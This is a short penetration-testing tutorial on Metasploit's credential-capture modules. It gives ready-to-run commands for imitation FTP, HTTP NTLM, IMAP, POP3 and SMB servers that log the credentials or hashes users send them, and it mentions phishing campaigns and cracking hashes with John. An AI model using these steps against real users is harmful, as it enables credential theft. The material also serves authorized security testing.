Discovery

The discovery stage follows immediately the reconaissance stage of a penetration testing by using the observable passive information to gather more active information such as username, password, and other sensitive data. Metasploit is a great tool for continous engagement where the tool enables the user to seamlessly pass from one stage to another without having to manually feed or pass the information gathered in each stage.

Credentials Capture

The credentials capture module helps in gathering username and password by hosting an imitation server that can receive the connection from a user or service and then dump the gathered information into a file. This can be applied to automated systems or in a phishing campaign by having the system or user to connect to Metasploit hosted service. The Metsploit tool can be used to host various service using the following commands,

FTP

use auxiliary/server/capture/ftp
run

Once the user logs in the credentials will be printed on the screen.

HTTP

The HTTP NTLM module captures the NTLM/LM challenge over HTTP,

use auxiliary/server/capture/http_ntlm
set LOGFILE captured_hashes.txt
set SRVPORT 80
set URIPATH /
run

Here, we have set some of the parameters such as storing the hash in a file, listening on a port and setting the URI path. These are optional and many more such options can be set.

iMAP

The iMAP module collects user mail credentials,

use auxiliary/server/capture/imap
run

POP3

The POP3 module collects user mail credentials,

use auxiliary/server/capture/pop3
run

SMB

The SMB module captures user password hashes when a user tries to connect to the SMB share.

use auxiliary/server/capture/smb
set JOHNPWFILE /tmp/smbhashes.txt
run

The password hash will be delivered to the file. The hash can be cracked using John.